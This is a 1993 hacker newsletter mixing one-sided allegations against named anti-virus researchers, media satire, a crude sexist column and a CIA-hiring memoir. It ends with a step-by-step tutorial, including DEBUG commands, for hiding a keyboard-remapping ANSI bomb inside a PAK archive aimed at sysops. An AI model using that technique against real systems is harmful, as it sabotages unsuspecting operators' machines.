Text File | 1993-08-14 | 57KB | 1,243 lines
CRYPT NEWSLETTER 17
-=July-Aug 1993=-
Edited by Urnst Kouch
CRYPT INFOSYSTEMS BBS: 818-683-0854
INTERNET: ukouch@delphi.com, or
70743.1711@compuserve.com
------------------------------------
IN THIS ISSUE: MOLEHUNT - A wilderness of mirrors encountered
while probing the events behind AIS . . . QUOTABLE QUOTES: A
reporter's resource guide for hacker/computer virus news . . .
Raoul Badger reports from our east coast bureau in Naples,
SC . . . Aristotle's Stupid ANSI-bomb Tricks . . . An interrupt
vector lister from KohnTarK . . . YB-X virus: twisting code
into a pretzel to foil heuristic analysis . . . much more.
MOLEHUNT: THE COLD, SECRET WAR OF VIRUS HUNTERS
[The following story continues with news surrounding the break-up
of hacker information files on the US Bureau of Public Debt's
Security Branch BBS. Because of the controversial nature of the
files - system hacking software, tutorials and virus source code -
The Bureau of Public Debt BBS became the target of a campaign
of anonymous protest aimed at closing the system. Because of the
controversy and whispering, mostly fueled by security worker
Paul Ferguson, administrators at Public Debt demanded the files
be removed from the system. Weeks later the events were
splashed hysterically onto the front pages of the national news
media which, unsurprisingly, got the story wrong. Spurred by
this imbalance, the Crypt Newsletter, Computer underground Digest
and others in the on-line community have slowly brought out
the complexities of the issues, personalities and secret dealings
behind the official news. This segment exposes some of the
unethical behavior practiced by the Computer Antivirus Research
Organization (CARO), a publicly sanctimonious self-selected
group of professionals and pan-professionals with the purported
aim of keeping the world safe from computer virus infection.]
As the smoke clears from the ruins of the Bureau of Public
Debt's Security Branch bulletin board system, the only
thing to be seen is that, given their druthers, many
anti-virus software developers and security experts are little
different than caricatures of the venal computer thugs
they'd like to persecute.
Consider: according to sources at The Bureau of Public Debt,
months prior to the campaign against the Public Debt
system, Computer Antivirus Research Organization (CARO) member
Joe Wells had attempted to enlist the aid of department
security workers in targeting and harassing, with the final aim
of shutting down - by whatever means necessary - a list of
bulletin board systems suspected of storing computer viruses.
The list, compiled by CARO, appeared, according to Public Debt
sources, to name some organizations and systems with
no connection to the computer underground or BBS's which
trade in computer viruses. Security branch workers rebuffed
Wells' proposal as stupid and liable to result in
legal retaliation.
About the same time, CARO member Klaus Brunnstein
of The University of Hamburg's (Germany) Virus Research
Center threatened Public Debt's Security Branch with a
press campaign if virus source code and hacker tools were
not removed from its BBS.
This nettled Security Branch workers, who knew that other
CARO associates were helping themselves to the files in
contention.
What emerged was nothing less than a picture of CARO
anti-virus software developers slithering out of some damp
underground cave, wending their way between stalagmites like
sightless, poison-skinned amphibians bent on petty schemes
of overthrow aimed at rivals and selected, real or imagined,
virus programming public enemies.
In March, right on schedule, CARO member Alan Solomon lobbied
publicly against the Public Debt BBS at an IEEE Computer
Security conference in NYC. But in a grand stroke of
cosmic irony, a member of the hacker/virus-programming
group Phalcon/SKISM known as Timelord "trashed" an
embarrassing CARO order-of-business memo written during an
informal meeting at the same conference. Subsequently, the
CARO memo was passed on to Black Axis virus exchange sysop John
Buchanan who eventually sent it around the globe on
the NUKE_THEWORLD FIDONet echo in July.
The memo is unique in that it provides an inside look at the
schizophrenic nature of CARO. Up for CARO membership,
it reads, is virus exchange sysop John Buchanan. (He
was later turned down.) It also admits a "leak"
in the CARO virus collection (onto virus exchange bulletin
board systems) necessitating some form of "tagging" of
files so that sources can be traced. The memo also requests
members to PUBLICLY disavow the existence of any such
CARO virus collection.
Most interesting is the recirculation of Joe Wells' "virus
exchange" hit list idea. According to CARO, "it's mostly a US
problem" which is to be addressed by setting up a "Murky Database"
of virus exchange systems and their operators with the
aim of galvanizing a police prosecution against those found criminal,
but not against those innocent.
It is worth noting that CARO, a self-selected professional/pan-
professional organization with primarily FOREIGN leadership, isn't
above trying to instigate police investigations against US
citizens.
This kind of secret campaigning by CARO-members travels from
west to east, too. Recently, CARO member Glenn Jordan
solicited the aid of virus exchange sysop John Buchanan in
an attempt to discredit a European researcher applying for
membership in CARO. Jordan wanted Buchanan, who has by turn
been nominated for membership in CARO, turned down, and targeted
for harassment by the organization for running a system which
sells and trades viruses, to supply CARO with evidence that the
researcher in question had purchased viruses from his bulletin
board system. Buchanan, also known as Aristotle, refused to
cooperate, showing more integrity than any of the mentioned
CARO members.
In retrospect, it becomes far less surprising that the Bureau
of Public Debt's BBS manager, Kim Clancy, would wish to have as
little to do as possible with any of a group of embarrassingly
smelly fish.
The remainder of the story has been extensively covered in
Computer underground Digest and previous issues of The
Crypt Newsletter. Acting under the encouragement of CARO-
member Alan Solomon, security worker Paul Ferguson planted an
anonymous letter of complaint in RISKS Digest 14.58 and later
supported it with a piece under his own name. Bureaucrats at The
Bureau of Public Debt, spooked by Ferguson's "anonymous"
letter and the possibility of congressional inquiry, removed
hacker tools and virus code from the system.
Weeks later, the story broke in one-sided fashion at The Washington
Post, with Paul Ferguson again able to carry himself off as
a "whistle-blower" and independent, but concerned "expert."
The official reality created was one of Kim Clancy and The
Bureau of Public Debt smeared as "morally bankrupt," according
to one spin-off news piece by columnist Wayne Rash in
the specialty tabloid, Communications Week.
This world of suspicion, charge and countercharge has been
nothing if not a wilderness of mirrors, blinding and stupefying
to those looking in from the cold, but clearly revealing the
underhanded, sub rosa tactics of many anti-virus researchers to
those with the patience to look deep into its reflecting surface.
[Because of the sheer size of letters and related debate on
this issue received by The Crypt Newsletter, we could not publish
everything we might have liked. For further material,
we point to recent issues of Computer underground Digest,
or the archives at Crypt InfoSystems BBS (818-683-0854)
which contain extensive collections of network electronic
mail dealing with the Public Debt BBS news story.]
QUOTABLE QUOTES: A JOURNALIST'S RESOURCE SHEET USEFUL IN
ADDING PUNCH TO ANY STORY ON COMPUTER VIRUSES OR
HACKERS.
"The sleep of reason brings forth monsters." --Goya
While researching topics of concern to anti-virus software
industry workers and computer virus programmers, The Crypt
Newsletter has managed to collect a great amount of potentially
confusing text, a literary land-mine so to speak, just
waiting to blow the foot off anyone blundering around
unescorted in the field. As a public service, I've put together
this list of "quotable quotes" and how and when to deploy
them in stories on computer viruses and hackers. If you're
a journalist or just some yahoo who needs to punch up a
rant with superficially convincing expert testimony,
feel free to use them, properly credited, of course.
For the time when you need a good definition of the
term "hacker":
"Hackers are people analogous to drug addicts. They need
their fix and cannot leave the machine alone. Like addicts
they seek novelty and new experiences. Writing a virus
gives them this, but unlike addicts who get immediate relief
after a fix, they are not usually present when the virus
triggers and releases its payload."
--Jan Hruska, anti-virus software developer, in
"Reefer Madness", oops - I mean,
"Computer Viruses and Anti-Virus Warfare"
For the time when you need a good definition of the term
"freak" [sic]:
"[Freaks are] an irresponsible subgroup of hackers, in the
same way some drug addicts remain reasonably responsible
(and use sterile needles), others (psychopaths) become
irresponsible (and share needles). Freaks have serious
social adjustment problems . . . unspecified grudges against
society. They have no sense of responsibility or remorse
about what they do . . . The mentality of the freak virus
writer is not unlike that of a person who leaves a poisoned
jar of baby food on a supermarket shelf. He delivers his
poison, leaves and is untraced, and in his absence the
victim falls."
--Jan Hruska, same as above
For when you need just the right touch of righteously
indignant flatulence:
" . . . it's been a while since the Treasury has openly
helped lawbreakers ply their illicit trade."
--columnist Wayne Rash, on the US Public Debt
BBS, in - and I am not making this up - "Rash's
Judgment", Communications Week, June 28, 1993
And, equally good:
"The fact that the Treasury Department clearly has
demonstrated the depths of its moral bankruptcy may
not surprise those of us in [fill in your locale here],
but it should cause concern in the country in general."
--columnist Wayne Rash
This next one is for when you want to scare someone
with the evil genius of virus authors.
"One such virus-mutation engine, called Dark Avenger
[sic], and available in the darker corners of the
electronic bulletin board universe, lets expert programmers
create polymorphic viruses."
--Peter Lewis, in his "Executive Computer"
column in The NY Times, July 5, 1993
And this is for when you want to convince someone that
it doesn't take an evil genius to make viruses. [Hint:
Don't use it in the same story as the above, it will just
confuse readers.]
" . . . with this [virus code], relative amateurs could create
new viruses, according to software writers."
--reporter Joel Garreau in The Washington Post,
June 20, 1993
This one is good for that human element "features section"
writers are fond of. It has one anti-virus software developer
taking a publicity op to blind-side a more successful
competitor.
"Just a couple of years ago, one anti-virus product
developer created [demand for his product] at will with
trumped-up and wildly exaggerated prognostications about
what a new virus was going to do and when it was going to do it.
Remember Michelangelo?"
--Pam Kane, president of Panda Systems, quoted
by Peter Lewis in his "Executive Computer"
NY TIMES column [see above]
And here's one by a guy totally unconnected to virus/anti-virus
commercial interests, a truly "independent" expert, a writer
of fiction.
"There are all sorts of expensive programs nowadays for
detecting and neutralizing viruses. And a whole lot of
people thinking up ways to invent viruses that can't be
got rid of. It's a whole industry. Lovely. I mean
_rotten_."
--Dick Francis, former jockey and wildly
successful mystery novel author, in
his recent work, "Driving Force" (Putnam).
The last quote I leave you with is a real crusher.
Including it as a snappy editorial capper will crown you
king or result in vilification beyond belief, depending
on the political slant of your peer group.
"And if [bringing back moral and ethical backbone] fails,
we can always resort to our barbaric past -- 'If a child
shows himself incorrigible, he should be decently and
quietly beheaded at the age of twelve.' (Don
Marquis, American journalist)"
--National Computer Security Association News
editorial, May/June 1993
RAOUL BADGER, MEDIA CRITIC, REPORTS FROM THE CRYPT NEWSLETTER'S
EAST COAST BUREAU IN NAPLES, SC:
So you've read Badger's reviews and come to the conclusion
that he is a lonely, bitter misanthrope without prospects
for a meaningful career or a decent Friday night date.
Well, no comment.
But in an effort to show that literacy in America is not a
total waste, I'm compelled to examine an article by Scott
Shepard, written for the Cox News Service.
Mr. Shepard's article appeared in The State Newspaper
(of Columbia, SC) under the title:
"ROAD WITHOUT SIGNS:
"Vision of information highway lacks design, rules for drivers"
Mr. Shepard has done his research, being less than
impressed with the "Information Highway"!
The best line in the piece is repeated five times:
"12:00" "12:00" "12:00",
a not-so-subtle way of reminding the reader of the millions of
Americans who lack the know-how or will to master the skill
of setting the time on their VCR. [Crypt Newsletter techno-hint:
Place a rectangle of black electrical tape over the digits. That
will fix it nicely.]
Other highlights of this little gem:
"The VCR jokes told by the experts and policy-makers reflect
their unease about their 'Field of Dreams' gamble that, if
you build it, users will come.
"The good news is everyone in Congress supports the information
superhighway . . . [t]he bad news is nobody in Congress
understands what the information superhighway is."
-the above is a quote from Rep. Ed Markey,
chairman of the House Subcommittee on
Telecommunications and Finance. And before
you run off looking to shake his hand
consider detractors rate Markey little
more than a press hound, equally lacking
of techno-savvy as his Congressional
brethren.
And, here's another:
"... superlatives spawn skepticism, however, especially since
neither the design of the information superhighway nor the rules
of the road governing such basics as access, privacy and
copyrights have been advanced.
"Another basic issue -- who will pay for it -- hasn't been
emphasized in the public debate.
"....T.J. Rodgers, president of Cypress Semiconductor Corp.,
called the administration's proposal a handout and labeled
the information superhighway 'the most recent example of
industries lining up to feed at the public trough.'"
"The potential for amazing advances in individual thought and
creativity is very real, but so is the potential for oppression
and mistrust, the likes of which we have never seen before..."
-Emmanuel Goldstein, publisher of 2600
Magazine
Simply amazing! A balanced, well researched article on the
information highway that doesn't regurgitate Mitch Kapor's
pablum.
Maybe there is hope for journalism in America, after all!
Ah, but the cynic thinks, maybe not. The July 19, 1993 issue
of TIME has a full page story on "Heartbreak in Cyberspace."
My, my, my. Seems that some Lothario used the WELL [the Whole
Earth 'Lectronic Link] to develop ongoing relationships with
a number of "babes" [sounds of local P.C. Bund members knocking
on my door], oops, sorry, make that "women."
Oh yes, Don Pardo-Lothario had one exchanging passionate phone
sex for hours on end. He won another's complete trust. A third
split the cost of an airline ticket so they could share a hot
and steamy weekend.
The rest of the story is stupidly obvious. Casanova-Don
Pardo-Lothario dumps the cow after getting cream [sound of local
P.C. Bund members breaking down my door], agghhh, make that
"shows himself for the low-life scum he really is." Heartbroken
b---, uh, woman commiserates with girlfriends and finds out she
ain't the first. Women band together to spread the word on the
fiend.
This sparks "a network-wide debate on the spoken and unspoken rules
of electronic etiquette," with all the standard recriminations and
rationalizations.
I can understand that TIME had space to burn, but don't the
people on the WELL have anything better to do? Jeez, I can hear
this kind of crap at any Xerox machine in any fair sized office in
the country. Are there really people willing to spend two bucks
an hour to hear it again? [Don't answer that. It's rhetorical.]
And what about this stunning conclusion?
"'I feel like an absolute fool,' says Lisa. 'People
look at a computer and fail to realize that behind those
words is a real person with feelings.' Welcome back to
the real world."
This is news? If Paul Fussel read it, he'd be rolling in
a pool of his own sick. As long as there have been primates
with swinging dic-- . . .[sounds of local P.C. Bund members
strapping me into an electric chair] uh, there have been lying,
cheating bastards willing to use any means necessary to achieve
gratification. If you're a woman and don't know this, collar
any guy and he'll admit it. Hell, we're even proud of it. If no
men are handy, ask any woman. Most will agree.
Since using a keyboard has not been shown to dramatically
lower testosterone levels, why is any of this surprising?
Oh well, Mr. Badger is signing off. There's 'babes' [sounds of
local P.C. Bund members trying to execute me] at The WELL who
need, heh-heh, "consolation and sympathy."
IN RELATED NEWS: A THUMBNAIL SKETCH OF CONGRESSMAN ED MARKEY,
U.S. POLICYMAKER FOR COMPUTERS AND TECHNOLOGY ISSUES
In an August 1 news piece, The L.A. Times proclaimed Democrat
Rep. Ed Markey, "The Man Who Is 'Plugged in' to How the Nation
Communicates." Citizen Markey is of interest to newsletter readers
because he sits in charge of the House Telecommunications and
Finance subcommittee and has recently imposed himself on the
issues of privacy and encryption, the 'information superhighway'
and the public availability of virus source code and hacker tools
on the US Bureau of Public Debt's Security Branch bulletin board
system.
The 47-year-old Massachusetts Congressman became a player
in the Public Debt controversy only after reading about it
in The Washington Post. He subsequently sent a letter of
protest to Secretary of The Treasury Lloyd Bentsen (Public
Debt is subsidiary to the Dept. of Treasury) which was republished
in Computer underground Digest 5.57. In addition, Markey
collaborated with the National Computer Security Association's
recent Computer Virus Awareness Day confab in the nation's
capital, and it seems certain he will be involved in a drive
for new legislation against computer viruses and their trade which
is expected to crest in the winter months of this year.
However, according to The L.A. Times, the politician who would
contribute to future policy on telecommunications, computer viruses
and the "information superhighway" has an office with only a
minimal set of the "high tech" tools he claims are part of the
nation's future: a telephone, TV, videocassette
player and fax machine. Hmmmm, no personal computer?
In addition, in July 1988 Washingtonian magazine published a poll
dubbing Markey the "No. 1 'Camera Hog' in Congress."
Markey also acknowledged to The L.A. Times that he accepts
contributions from leaders in the industry he's in charge of
regulating. Political rivals call this improper and in 1990,
consumer activist Ralph Nader went on record in The Boston Globe
claiming, "[Markey is] getting on a first name basis with too many
people in the industries he oversees, having too many dinners
with them."
Although lauded by Telecommunications and Finance subcommittee
underling Rep. (Dem.) W. J. Tauzin of Louisiana who stated for
The L.A. Times that, "Ed Markey has arrived" and courtier for
the entertainment industry, Motion Picture Association of America
president Jack Valenti, who said "[Markey is presiding] over a sea
change in the way we communicate," Times business reporter
Jube Shiver, Jr., did not document any Markey-inspired technology
legislation which has been of benefit, directly or indirectly, to
the average American.
DELL COMPUTER SURVEY SHOWS AMERICANS PHOBIC AND BAFFLED BY
DIGITAL ALARM CLOCKS, UNREADY TO DRIVE ON 'INFORMATION
SUPERHIGHWAY'
A Dell Computer survey of 1,000 adults and 500 teens across
the country found a sizeable percentage mentally ill-prepared
to assault the coming 'information superhighway.'
Twenty-five percent of those surveyed said they would not
use a computer unless it meant their job. Another quarter had
never used a computer or even recorded a favorite TV show on
a VCR.
More results from the Dell poll:
--Thirty-two percent of all adults were so cowed by
computers they feared breaking the machines if allowed
to use them unguided. Of these, 22 percent admitted fear
at the prospect of setting digital alarm clocks.
--Fifty-one percent of the adults also found computers
and related technology baffling; 58 percent found the
pace of technological advance confusing.
Shhhhh. Loose lips sink ships! The Crypt Newsletter advises
not sharing this data with any mainstream business and technology
writers. They could become morose - perhaps even suicidal - at
the mere thought of having to 'eighty-six' 50 percent of all new
story ideas for the remainder of 1993.
CRYPT NEWSLETTER FEATURE: HIRING PRACTICES AT THE CIA - NO
BEDWETTERS ALLOWED
[This story was originally published by Times-Mirror, Inc.
in 1992, but we felt it's just the kind of thing newsletter
readers would find fascinating. Republished with
permission.]
So you want to be a spy? And you're sure the place to go
is the CIA!
The CIA _is_ interested in hearing from you. It interviews
thousands of Americans for jobs as spies, intelligence
analysts and technical specialists every year. But because
of its classified mission, hiring methods are unusual and
Kafka-esque, taking at least a year to complete and bound in
smothering bureaucratic process, comic ineptitude and secrecy.
Although the number of people employed by the CIA is classified,
it regularly recruits on college campuses and through the
job listings in major metropolitan newspapers. A recent
series of advertisements aimed at minorities in magazines
like Ebony drew spectacular media attention, but the typical
CIA ad is bland and unassuming, easily blending in with
countless other corporate calls for highly-trained, college-
educated Americans.
A year ago, one such ad ran in The Philadelphia Inquirer.
Candidates were encouraged to send resumes for consideration
to a post office box drop in Pittsburgh, one of the agency's
regional personnel clearinghouses. Candidates would be
required to undergo a rigorous physical examination and
polygraph test, the ad warned ominously.
I forwarded my resume to the CIA mail drop, listing my
qualifications as a scientist and journalist with the
reasoning that these talents would be useful in analysis.
Apparently, the CIA's personnel staff agreed. They got
back to me in about a month and, in so doing, began a
unique series of communications.
Candidates, you see, are not contacted directly by the
CIA. Instead they are delivered mail that requests them
to contact an agency worker by telephone within a certain
time frame. The contacts are often anonymous. For example,
prospects whose last names began with "S" were asked to
phone "Bobbi - Program Officer" at the CIA's Stafford
Building in Tyson's Corner Center, VA.
The initial interview with the CIA usually involves a type
of cattle call. About a year ago, 30 of us met in a room
at The Valley Forge Convention Center. There we underwent
preliminary screening from a CIA team led by Pittsburgh-based
representative Virginia Kraus. The team included workers
from the agency's directorates of intelligence, operations
and science and technology, including one agency employee
who looked over my resume, saw that I worked at a newspaper
and added that he had come to the agency as a newsman, too.
It was the job of this spy and his colleagues to weed out
potential crazies and issue to the remainder the agency's
personnel Holy Grail, the 30-page Personal History
Statement (PHS).
The PHS is an inventory that scrutinizes all aspects of the
job candidate's professional and private life. It becomes
the basic curriculum vitae used during hiring and the template
for the CIA's security team during its investigation of
potential agents.
"Don't leave anything blank," warned one of the spies balefully
at the convention center. "I didn't think anyone would really
sit down and go over the whole thing when I started, but
believe me, they do."
The PHS requires the spy-in-waiting to designate references
in a number of categories, including family members, professional
acquaintances and personal (not family) acquaintances who have
lived in close proximity to the candidate for a year or two.
"This is so the agency can call up your neighbors and ask them
if there's loud music and blue smoke coming out of your front
door on the weekends," Kraus cracked.
The candidate is asked to document any record of criminal
activity including theft, traffic violations, sexual deviance
and perversion, unlawful drug use or undue publicity surrounding
a divorce or civil suit. There is a battery of medical inquiries
probing the candidate's injuries and hospital visits, mental
stability, prescription and non-prescription drug use, gastro-
intestinal health and nocturnal micturition frequency.
The candidate is warned that the veracity of his statement
is liable to be tested by polygraph. Accompanying submission
of this dossier to the CIA are any collegiate transcripts
and a long writing sample dealing with any topic of interest
to intelligence workers. For example, writing about home
grown pilot plants designed for the production of biological
warfare agents in Third World countries is appropriate if
you're applying for a job as an analyst.
All candidates were warned not to inform anyone except close
family members of their CIA screening. Kraus encouraged the
use of a cover like "the government" or "Department of
Defense" when notifying those who needed to be designated as
references.
A few months after submission of the personal statement and
transcripts, the candidate is likely to get a phone call
from CIA security who identifies himself only as a member
of "the Agency."
His job is to verify and embellish some of the information
included in the PHS, specifically those sections dealing with
criminal activity and homosexuality.
In my case, the agent was particularly interested in a reference
to recreational marijuana use in college.
"How many cigarettes would you say you smoked?" he asked.
Satisfied with the answer, the agent continued by inquiring
about drinking.
"The Agency's position in these matters is one of abstention
enforced by testing," he said. That concluded the interrogation.
"You have a nice day," said the spy before hanging up.
Most of this preliminary screening is in response to much
publicized problems the CIA has had in the past with the
penetration by the criminal or mentally ill. James Jesus
Angleton, the feared head of the CIA's counterintelligence
wing and one of the most powerful men in the agency during
the height of The Cold War, left his office in disgrace,
having acquired a reputation, documented by journalists
Thomas Mangold and Seymour Hersh, as a paranoid alcoholic
and pathological liar.
If the prospective employee's personal statement and transcripts
survive the initial evaluation, he or she is given a series
of aptitude and psychological tests.
Those in eastern Pennsylvania were again contacted and issued
a ticket/summons for the tests, which were administered one
summer Saturday morning in the physics building at the University
of Pennsylvania in Philadelphia.
The testing at Penn, an all-day affair, included a series of
vocabulary, simple math, reading comprehension and abstract
thought multiple-choice quizzes, similar to a college aptitude
test.
Also included was the California Psychological Inventory,
devised by Dr. Harrison Gough, psychologist. Our copy,
which had a copyright date of 1956, asked for true/false
responses to a number of statements, including:
1) I have gotten myself into trouble because of my involvement
in unseemly sexual activities.
2) In high school I was often sent to the principal's office
for "cutting up."
3) I sweat in even the coolest weather.
4) I believe it is every citizen's duty, as part of the community,
to keep his sidewalk and lawn neat and clean.
5) I must admit, I think people are fools who don't think the
American way is the best there is.
6) I often think people are watching me.
7) I like tall women.
8) I must admit, I don't mind being the "cut-up" at the office
party.
One can only wonder what the two women who took the psychological
inventory that Saturday answered to question No. 7.
It seemed curious that the agency was using a test from 1956 --
when presumably very few women applied for jobs in intelligence
and when being a "cut-up" in high school was one of the worst
things you could be accused of - to screen young professionals
in 1991.
Two other tests included a work environment survey and a current
world events test, both tailored for the CIA.
For example, the work environment survey asked whether the
candidates would accept a job in a foreign culture or where
conditions of extreme physical hazard (presumably a war zone),
unpalatable food, no sanitation or debilitating disease
prevail. It also focused on whether candidates would be
willing to work anonymously and without recognition for
long periods of time for people they find personally
repugnant.
The hardest test was the current world events quiz. It presumed
a comprehensive knowledge of world politics and personalities
that might only be gained from religious study of The Washington
Post or a background in international relations.
After the testing, a couple more months passed.
Candidates were then informed by mail whether they had been bound
over for interview at CIA headquarters in McLean, VA.
During this 9-month long period, no one from the agency had
spoken to me for more than five minutes.
Finally, another letter arrived. It included an appointment
date with "Agency Officials" interested in discussing
possible employment.
The interview was set for the week after Thanksgiving in the
Directorate of Intelligence's Office of East Asian Analysis.
"Ellie" was my contact. A room was reserved for the night
before at The Days Inn in Vienna, VA.
It was a 15-minute drive to the CIA the next morning. The
unmarked compound is not far from Langley High School.
You can tell you are there by the barricades of concrete and
obstacle-wire surrounding the wooded campus.
The entrance block-house guard was supposed to check my
photo driver's license, but he handed it back and waved
me through without taking a look.
The Directorate of Intelligence is a modern-looking edifice
of cement and green glass. At the entrance were a score of
smokers bearing the same furtive, hounded look seen at
other corporations where smoking within the building has been
banned.
Just inside was a marble hallway containing a likeness of
William Casey.
Getting to the Office of East Asian Analysis entails a check-in
at reception, where I presented my papers. After a few minutes,
"Ellie," a middle-aged woman showed up to escort me.
I was issued a green piece of paper and a pass card used to get
through an electronic Pinkerton security turnstile. A security
man gave my briefcase the once-over. Overhead was a sign
stating that passage beyond the portal conferred agreement
to a search of your person, your belongings and your car at
any time.
The agency has been sensitive to accusations that it's possible
to walk out of the building with highly classified materials
ever since 1978, when William Kampiles walked off CIA grounds
with technical manuals for the super-secret National Reconnaissance
Office's KH-11 spy satellite. Kampiles, a junior clerk, was
sentenced to 40 years in jail for selling the manual to the
Soviets. During the same period, 16 other KH-11 manuals
disappeared and were never traced.
While I was coming in, many were coming out. No bags were
checked. Later, when I left, no one asked about my
briefcase.
Upstairs in the Office of East Asian Analysis, National
Geographic-like photos of China adorned the walls.
Documents marked "SECRET" littered the desks.
Sadie Brown-Fields, a personnel administrator for the office
was holding court.
In her office, I asked her if the recession had affected
hiring. It had, she said. "I don't like the word
'down-sizing'," she said with a glassy smile. "We
call it 'right-sizing.'"
Fields said she couldn't say whether the agency's "right-
sizing" involves cuts in 60 percent of prospective
hires, as had been recently reported in national newspapers.
But then she changed her mind and commented, "That's a little
high."
This has created problems for the agency, she said. Since
attrition isn't removing veterans at the expected rate,
it's been difficult to bring in new people, she added.
Complicating matters is the polygraph and security check.
"Eighty to 90 percent of the people to whom the agency
makes an offer fail it."
As for where I fit into things, interest was from the
China Division: Industry & Technology branch of the
office.
"The section head's not here today," said Fields. "But
Ken Sawka will speak with you."
Ken Sawka turned out to be an airy, blond-haired analyst
with a master's degree in international relations from
American University. I thought Ken had what is known as
a paper rectum, a demeaning but accurate descriptive which
used to be in fashion.
"What did you say your name was?" he asked as we walked
down the hall to his boss's empty office.
Sawka didn't have my resume, my PHS or any information on
my scientific background, the reason I was being interviewed,
so he didn't ask any questions, preferring instead to
talk about himself.
How many scientists are currently working in the office,
I finally asked.
"None," Sawka said. "That's why we're trying to look at
some."
The agency, Sawka said, made up for this lack by sending
analysts to seminars on topics the various departments
may have to deal with, such as ballistic missile technology.
Sawka added he was glad he had finally learned what an
accelerometer was and how integral design is to ballistic
missile development.
I asked Sawka about the polygraph screening and nature of
the psychological testing.
He laughed nervously but said, "Everybody has to go through
it and it's not any fun. But security believes very
strongly in it and the agency works hard to get candidates
through the lie-detector. We allow them to take it three
times."
At the end of the interview, Fields asked me to take some
"stuff" over to the Stafford Building for her when I went there
to collect travel expenses. A moment later she thought better
of it, but supplied me with directions anyway.
Outside the Stafford Building later in the day were more harried
smokers. Inside I asked for gas money ($20) and mileage.
A CIA worker insisted that this be compared against the price
of the lowest airline ticket from Philadelphia. I argued
that this was ridiculous, to no avail.
As predicted, a telephone call to a CIA airline-ticket specialist
came up with a figure far in excess of the gas money. The
agent then gave me a little more than $200 of the taxpayer's
money, a generous per diem, and mileage allowance.
The hotel room had been paid in advance.
A call to Fields' office a few days later elicited the
information that in East Asian Analysis, there were no
job openings and no hiring plans.
When I asked why, in that case, the testing and interviewing,
no one had an answer except to say "the agency has to plan
for every contingency."
ARISTOTLE'S STUPID ANSI BOMB TRICKS or DON'T UNPAK THAT PAK!!!
The latest craze to hit the virus scene is the use of the old
ANSI bomb in PAKed CON file. Perfected in the Ukraine by an
ancient soothe sayer of soothe that needeth saying, this tiny
non-conformity packs a wallop! Just ask the folks at McAfee's
who allegedly took a nukeage from one. Why all the hub-bub
about them? Well, I'll tell ya! It seems that the redirected
keyboard trick still works when deployed from the CON device into
a target rich environment. Unwary sysops who utilize the new
comforts of auto-scanning their uploads are learning that the
risk of a serious nukeage still exists. So that you may better
understand how this function works, I have laid out a little
example;
Make an ANSI bomb with the TJA-ANSI bomb creator from RABiD.
(Hopefully, Dr. Kouch included it in this issue of the CRyPT
NEWSLETTER... If not, BITCH!) I have included the displays so
you will be able to have a full explanation of what is going
on. (Trust me! If you can't follow this program *WITHOUT* the
following examples, you don't need to be using a computer in
the first place.)
────────────────────────────────────────────────────────────
════════════════════════════════════════════════════════════
THE ANSI BOMB GENERATOR 1.03ß (C)1990 by The Jolly Anarchist
════════════════════════════════════════════════════════════
MAIN MENU
═════════
[A] Create An Ansi Bomb
[B] Add A Bomb To A File
[C] Information/Help
[D] Exit to DOS
Your Choice?
────────────────────────────────────────────────────────────
Obviously, you want to create the thing at this point :)
So choose "A"
Simply pressing the <Space Bar> will insert the desired key that
you wish to redefine...
────────────────────────────────────────────────────────────
Enter Key to Re-Define : 32
Please Re-Enter the Key : 32
Continue?
────────────────────────────────────────────────────────────
Once you've chosen your key, the next thing you will need to do
is name the program you want executed when the bomb goes off.
────────────────────────────────────────────────────────────
Enter Your Sequence Below. You may not backspace, so GET IT RIGHT!
Type: '/S' to save, '/A' to abort, '/R' to Restart, '?' for help
═══════════════════════════════════════════════════════════════════
DIR
Save Sequence?
────────────────────────────────────────────────────────────
Of course you save the silly thing! Follow the remaining prompts
and use that growth on your shoulders to answer the prompts.
────────────────────────────────────────────────────────────
{--------}
Enter a Name for this Bomb: TEST
{--------------------------------}
Enter a Description for this bomb: EXAMPLE FOR CRyPT
────────────────────────────────────────────────────────────
Aside from the free plug for the CRyPT Newsletter, the only
remaining thing to do in this program is to add the bomb to
an ANSI file, or simply leave it as it is and let the program
create one for you.
────────────────────────────────────────────────────────────
File to Add Bomb to: LOGO.ANS
Bombs Available :
TEST
{--------}
Bomb to add: TEST
────────────────────────────────────────────────────────────
Next you'll see...
────────────────────────────────────────────────────────────
Add Bomb to then [B]eginning or the [E]nd of the file?
────────────────────────────────────────────────────────────
I have found that if you add this little critter to the end of
the file, the entire ANSI will display whereas at the beginning
of the file, the ANSI may never appear. Anyhow, you now have a
file named TEST or LOGO.ANS that contains the strings for an
ANSI bomb that looks something like this;
68;73;82;13p
The way it reads is, SPACEBAR is redefined to 13p <RETURN>
So, what it will do is type ;68="D", ;73="I", ;82="R". (That's
DIR, for the mentally impaired) It can be anything, but for
this example and to be non-destructive, we'll use DIR. When
the unsuspecting SySop opens the file and the contents of the
CON file inside the .PAK file are expanded, the trigger is set.
A simple touch to the spacebar will yield nasty results. Here
though, you'll only see your smutty .GIF collection jump up at
you.
Questions that will arise...
Er, uh! Gee, Mr. ARiSToTLE, How do I get the ANSI bomb inside
the .PAK file???
Well, I'll tell ya!
Take your little creation and rename it to "YON" with no
extension. At the command line, create a .PAK file by typing
PAK A TEST YON
You will immediately see Mr. PAK sucking up the file...
Once it is all sucked up inside, this is where it gets fun!
Again, at the command line, type;
DEBUG TEST.PAK
You will see a single "-" waiting for some input. Type;
D 0100
This will list the first chunk of code in TEST.PAK and depending
on the version you have, you should see something like this;
-
2EC7:0100 1A 02 59 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..YON.Fr........
2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3
2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p..
2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P.
2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6...............
2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^
2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t
2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~.
-
In the first line, you see where it says YON.Fr? I sure hope so
or I'm spinning my wheels here... Now you will type;
E 0102 'C'
W
Q
Reason being, the 'Y' occupies that location and you want to
replace the 'Y' with a 'C', so that it spells 'CON'.
'W' will tell DEBUG to write it.
'Q' will take you back to DOS.
